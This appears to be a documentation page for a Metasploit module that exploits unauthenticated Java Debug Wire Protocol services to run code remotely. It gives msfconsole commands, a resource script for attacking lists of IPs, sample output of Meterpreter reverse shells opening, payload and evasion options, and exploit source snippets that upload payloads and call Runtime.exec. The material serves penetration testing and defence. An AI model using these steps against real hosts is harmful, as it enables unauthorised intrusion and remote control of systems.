Java Debug Wire Protocol Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/multi/misc/java_jdwp_debugger metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Java Debug Wire Protocol Remote Code Execution
Module: exploit/multi/misc/java_jdwp_debugger
Source code: modules/exploits/multi/misc/java_jdwp_debugger.rb
Disclosure date: 2010-03-12
Last modification time: 2018-09-15 18:54:45 +0000
Supported architecture(s): armle, aarch64, x86, x64
Supported platform(s): Linux, OSX, Windows
Target service / protocol: -
Target network port(s): 8000
List of CVEs: -
This module abuses exposed Java Debug Wire Protocol services in order to execute arbitrary Java code remotely. It just abuses the protocol features, since no authentication is required if the service is enabled.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Basic Usage
Using java_jdwp_debugger against a single host
Normally, you can use exploit/multi/misc/java_jdwp_debugger this way:
msf > use exploit/multi/misc/java_jdwp_debugger
msf exploit(java_jdwp_debugger) > show targets
... a list of targets ...
msf exploit(java_jdwp_debugger) > set TARGET target-id
msf exploit(java_jdwp_debugger) > show options
... show and set options ...
msf exploit(java_jdwp_debugger) > exploit
Using java_jdwp_debugger against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your java_jdwp_debugger will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/misc/java_jdwp_debugger")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Go back to menu.
Msfconsole Usage
Here is how the multi/misc/java_jdwp_debugger exploit module looks in the msfconsole:
msf6 > use exploit/multi/misc/java_jdwp_debugger
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_jdwp_debugger) > show info
Name: Java Debug Wire Protocol Remote Code Execution
Module: exploit/multi/misc/java_jdwp_debugger
Platform: Linux, OSX, Windows
Arch: armle, aarch64, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2010-03-12
Provided by:
Michael Schierl
Christophe Alladoum
Redsadic <[email protected]>
Available targets:
Id Name
-- ----
0 Linux (Native Payload)
1 OSX (Native Payload)
2 Windows (Native Payload)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
TMP_PATH no A directory where we can write files. Ensure there is a trailing slash
Payload information:
Space: 10000000
Avoid: 0 characters
Description:
This module abuses exposed Java Debug Wire Protocol services in
order to execute arbitrary Java code remotely. It just abuses the
protocol features, since no authentication is required if the
service is enabled.
References:
OSVDB (96066)
https://www.exploit-db.com/exploits/27179
http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
https://seclists.org/nmap-dev/2010/q1/867
https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java
https://svn.nmap.org/nmap/scripts/jdwp-exec.nse
http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
Module Options
This is a complete list of options available in the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show options
Module options (exploit/multi/misc/java_jdwp_debugger):
Name Current Setting Required Description
---- --------------- -------- -----------
RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8000 yes The target port (TCP)
TMP_PATH no A directory where we can write files. Ensure there is a trailing slash
Payload options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux (Native Payload)
Advanced Options
Here is a complete list of advanced options supported by the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show advanced
Module advanced options (exploit/multi/misc/java_jdwp_debugger):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
NUM_RETRIES 10 yes Number of retries when waiting for event
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/aarch64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/misc/java_jdwp_debugger module can exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show targets
Exploit targets:
Id Name
-- ----
0 Linux (Native Payload)
1 OSX (Native Payload)
2 Windows (Native Payload)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/java_jdwp_debugger exploit:
msf6 exploit(multi/misc/java_jdwp_debugger) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/linux/aarch64/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
6 payload/linux/aarch64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
7 payload/linux/aarch64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
8 payload/linux/aarch64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
9 payload/linux/aarch64/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
10 payload/linux/aarch64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
11 payload/linux/armle/exec normal No Linux Execute Command
12 payload/linux/armle/meterpreter/bind_tcp normal No Linux Meterpreter, Bind TCP Stager
13 payload/linux/armle/meterpreter/reverse_tcp normal No Linux Meterpreter, Reverse TCP Stager
14 payload/linux/armle/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
15 payload/linux/armle/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
16 payload/linux/armle/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
17 payload/linux/armle/shell/bind_tcp normal No Linux dup2 Command Shell, Bind TCP Stager
18 payload/linux/armle/shell/reverse_tcp normal No Linux dup2 Command Shell, Reverse TCP Stager
19 payload/linux/armle/shell_bind_tcp normal No Linux Command Shell, Reverse TCP Inline
20 payload/linux/armle/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
21 payload/linux/x64/exec normal No Linux Execute Command
22 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
23 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
24 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
25 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
26 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
27 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
28 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
29 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
30 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
31 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
32 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
33 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
34 payload/linux/x86/chmod normal No Linux Chmod
35 payload/linux/x86/exec normal No Linux Execute Command
36 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
37 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
38 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
39 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
40 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
41 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
42 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
43 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
44 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
45 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
46 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
47 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
48 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
49 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
50 payload/linux/x86/read_file normal No Linux Read File
51 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
52 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
53 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
54 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
55 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
56 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
57 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
58 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
59 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
60 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
61 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
62 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
63 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
64 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
Evasion Options
Here is the full list of possible evasion options supported by the multi/misc/java_jdwp_debugger exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/misc/java_jdwp_debugger) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PEER> - Not received response length
- <PEER> - Received corrupted response
- <PEER> - Server sent error with code <ERR_CODE>
- <PEER> - Not received response
- <PEER> - Received corrupted response
- Unknown format
- Unknown format
- Unexpected data when parsing server response
- Bad response when getting value for field
- Class "<LOOKED_CLASS>" not found
- Method "<LOOKED_METHOD>" not found
- Bad defined break class
- No network response
- No network response
- No network response
- <PEER> - No network response
- target_class is nil
- type_id is nil
- You need to add a trailing slash/backslash to TMP_PATH
- <OS> system detected but using <PLATFORM> target...
- Failed to allocate string for payload dumping
- Unexpected returned type: expected String
- Failed to allocate string for filename
- Unexpected returned type: expected Object
- Failed to create file. Try to change the TMP_PATH
- Unexpected returned type: expected Array
- Failed to create byte array to store payload
- Exception while writing to file
- Exception while closing file
- Failed to allocate string for payload dumping
- Unexpected returned type: expected Object
- Failed to invoke Runtime.getRuntime()
- Cannot find method Runtime.exec()
- Unexpected returned type: expected Object
- Could not find a suitable thread for stepping
- Could not set the event
- Security attribute not found
- JDWP Protocol not found
- Received <VALUE> responses that are not a 'step into' event...
- Event not received in <NUM_RETRIES> attempts
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Not received response length
Here is a relevant code snippet related to the "<PEER> - Not received response length" error message:
161: end
162:
163: # Reads packet response for JDWP protocol
164: def read_reply(timeout = default_timeout)
165: length = sock.get_once(4, timeout)
166: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
167: pkt_len = length.unpack('N')[0]
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
<PEER> - Received corrupted response
Here is a relevant code snippet related to the "<PEER> - Received corrupted response" error message:
164: def read_reply(timeout = default_timeout)
165: length = sock.get_once(4, timeout)
166: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response length") unless length
167: pkt_len = length.unpack('N')[0]
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
172: if err_code != 0 && flags == REPLY_PACKET_TYPE
173: fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
174: end
<PEER> - Server sent error with code <ERR_CODE>
Here is a relevant code snippet related to the "<PEER> - Server sent error with code <ERR_CODE>" error message:
168: if pkt_len < 4
169: fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
170: end
171: id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
172: if err_code != 0 && flags == REPLY_PACKET_TYPE
173: fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
174: end
175:
176: response = ""
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
<PEER> - Not received response
Here is a relevant code snippet related to the "<PEER> - Not received response" error message:
174: end
175:
176: response = ""
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
179: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
180: response << partial
181: end
182: fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
183: response
184: end
<PEER> - Received corrupted response
Here is a relevant code snippet related to the "<PEER> - Received corrupted response" error message:
177: while response.length + 11 < pkt_len
178: partial = sock.get_once(pkt_len, timeout)
179: fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
180: response << partial
181: end
182: fail_with(Failure::Unknown, "#{peer} - Received corrupted response") unless response.length + 11 == pkt_len
183: response
184: end
185:
186: # Returns the characters contained in the string defined in target VM
187: def solve_string(data)
Unknown format
Here is a relevant code snippet related to the "Unknown format" error message:
219: return [value].pack('Q>')
220: elsif fmt == "I" || fmt == 4
221: return [value].pack('N')
222: end
223:
224: fail_with(Failure::Unknown, "Unknown format")
225: end
226:
227: # Unpack Integer from JDWP protocol
228: def unformat(fmt, value)
229: if fmt == "L" || fmt == 8
Unknown format
Here is a relevant code snippet related to the "Unknown format" error message:
230: return value[0..7].unpack('Q>')[0]
231: elsif fmt == "I" || fmt == 4
232: return value[0..3].unpack('N')[0]
233: end
234:
235: fail_with(Failure::Unknown, "Unknown format")
236: end
237:
238: # Parses given data according to a set of formats
239: def parse_entries(buf, formats, explicit=true)
240: entries = []
Unexpected data when parsing server response
Here is a relevant code snippet related to the "Unexpected data when parsing server response" error message:
276: index += 9
277: elsif t == 73
278: data[name], buf = buf[index +1, 4].unpack('NN')
279: end
280: else
281: fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
282: end
283:
284: end
285: entries.append(data)
286: end
Bad response when getting value for field
Here is a relevant code snippet related to the "Bad response when getting value for field" error message:
411: sock.put(create_packet(GETVALUES_SIG, data))
412: response = read_reply
413: num_values = response.unpack('N')[0]
414:
415: unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
416: fail_with(Failure::Unknown, "Bad response when getting value for field")
417: end
418:
419: len = @vars["objectid_size"]
420: value = unformat(len, response[5..-1])
421:
Class "<LOOKED_CLASS>" not found
Here is a relevant code snippet related to the "Class "<LOOKED_CLASS>" not found" error message:
455:
456: # Checks if specified class and method are currently loaded by the target VM and returns them
457: def get_class_and_method(looked_class, looked_method, signature = nil)
458: target_class = get_class_by_name(looked_class)
459: unless target_class
460: fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
461: end
462:
463: get_methods(target_class["reftype_id"])
464: target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
465: unless target_method
Method "<LOOKED_METHOD>" not found
Here is a relevant code snippet related to the "Method "<LOOKED_METHOD>" not found" error message:
461: end
462:
463: get_methods(target_class["reftype_id"])
464: target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
465: unless target_method
466: fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
467: end
468:
469: return target_class, target_method
470: end
471:
Bad defined break class
Here is a relevant code snippet related to the "Bad defined break class" error message:
471:
472: # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
473: def str_to_fq_class(s)
474: i = s.rindex(".")
475: unless i
476: fail_with(Failure::BadConfig, 'Bad defined break class')
477: end
478:
479: method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string
480:
481: classname = 'L'
No network response
Here is a relevant code snippet related to the "No network response" error message:
488: # Gets the status of a given thread
489: def thread_status(thread_id)
490: sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
491: buf = read_reply(datastore['BREAK_TIMEOUT'])
492: unless buf
493: fail_with(Failure::Unknown, "No network response")
494: end
495: status, suspend_status = buf.unpack('NN')
496:
497: status
498: end
No network response
Here is a relevant code snippet related to the "No network response" error message:
505: sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
506: end
507:
508: response = read_reply(datastore['BREAK_TIMEOUT'])
509: unless response
510: fail_with(Failure::Unknown, "No network response")
511: end
512:
513: response
514: end
515:
No network response
Here is a relevant code snippet related to the "No network response" error message:
521: sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
522: end
523:
524: response = read_reply
525: unless response
526: fail_with(Failure::Unknown, "No network response")
527: end
528:
529: response
530: end
531:
<PEER> - No network response
Here is a relevant code snippet related to the "<PEER> - No network response" error message:
541: end
542:
543: sock.put(create_packet(EVENTSET_SIG, data))
544: response = read_reply
545: unless response
546: fail_with(Failure::Unknown, "#{peer} - No network response")
547: end
548: return response.unpack('N')[0]
549: end
550:
551: # Parses a received event and compares it with the expected
target_class is nil
Here is a relevant code snippet related to the "target_class is nil" error message:
625: end
626:
627: # Creates a byte[]
628: def create_array(len)
629: target_class = get_class_by_name("[B")
630: fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
631:
632: type_id = target_class["reftype_id"]
633: fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
634:
635: data = format(@vars["referencetypeid_size"], type_id)
type_id is nil
Here is a relevant code snippet related to the "type_id is nil" error message:
628: def create_array(len)
629: target_class = get_class_by_name("[B")
630: fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
631:
632: type_id = target_class["reftype_id"]
633: fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
634:
635: data = format(@vars["referencetypeid_size"], type_id)
636: data << [len].pack('N')
637:
638: sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
You need to add a trailing slash/backslash to TMP_PATH
Here is a relevant code snippet related to the "You need to add a trailing slash/backslash to TMP_PATH" error message:
655: end
656:
657: def temp_path
658: return nil unless datastore['TMP_PATH']
659: unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
660: fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
661: end
662: datastore['TMP_PATH']
663: end
664:
665: # Configures payload according to targeted architecture
<OS> system detected but using <PLATFORM> target...
Here is a relevant code snippet related to the "<OS> system detected but using <PLATFORM> target..." error message:
680: path = temp_path || './'
681: payload_exe = "#{path}#{payload_exe}.exe"
682: end
683:
684: if @os.downcase =~ /target['Platform']/
685: print_warning("#{@os} system detected but using #{target['Platform']} target...")
686: end
687:
688: return payload_exe, pl_exe
689: end
690:
Failed to allocate string for payload dumping
Here is a relevant code snippet related to the "Failed to allocate string for payload dumping" error message:
692: def fingerprint_os(thread_id)
693: size = @vars["objectid_size"]
694:
695: # 1. Creates a string on target VM with the property to be getted
696: cmd_obj_ids = create_string("os.name")
697: fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
698: cmd_obj_id = cmd_obj_ids[0]["obj_id"]
699:
700: # 2. Gets property
701: data = [TAG_OBJECT].pack('C')
702: data << format(size, cmd_obj_id)
Unexpected returned type: expected String
Here is a relevant code snippet related to the "Unexpected returned type: expected String" error message:
701: data = [TAG_OBJECT].pack('C')
702: data << format(size, cmd_obj_id)
703: data_array = [data]
704: runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
705: buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
706: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')
707:
708: str = unformat(size, buf[1..1+size-1])
709: @os = solve_string(format(@vars["objectid_size"],str))
710: end
711:
Failed to allocate string for filename
Here is a relevant code snippet related to the "Failed to allocate string for filename" error message:
710: end
711:
712: # Creates a file on the server given a execution thread
713: def create_file(thread_id, filename)
714: cmd_obj_ids = create_string(filename)
715: fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0
716:
717: cmd_obj_id = cmd_obj_ids[0]["obj_id"]
718: size = @vars["objectid_size"]
719: data = [TAG_OBJECT].pack('C')
720: data << format(size, cmd_obj_id)
Unexpected returned type: expected Object
Here is a relevant code snippet related to the "Unexpected returned type: expected Object" error message:
719: data = [TAG_OBJECT].pack('C')
720: data << format(size, cmd_obj_id)
721: data_array = [data]
722: runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
723: buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
724: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
725:
726: file = unformat(size, buf[1..1+size-1])
727: fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)
728:
729: register_files_for_cleanup(filename)
Failed to create file. Try to change the TMP_PATH
Here is a relevant code snippet related to the "Failed to create file. Try to change the TMP_PATH" error message:
722: runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
723: buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
724: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
725:
726: file = unformat(size, buf[1..1+size-1])
727: fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)
728:
729: register_files_for_cleanup(filename)
730:
731: file
732: end
Unexpected returned type: expected Array
Here is a relevant code snippet related to the "Unexpected returned type: expected Array" error message:
734: # Stores the payload on a new string created in target VM
735: def upload_payload(thread_id, pl_exe)
736: size = @vars["objectid_size"]
737:
738: buf = create_array(pl_exe.length)
739: fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
740:
741: pl = unformat(size, buf[1..1+size-1])
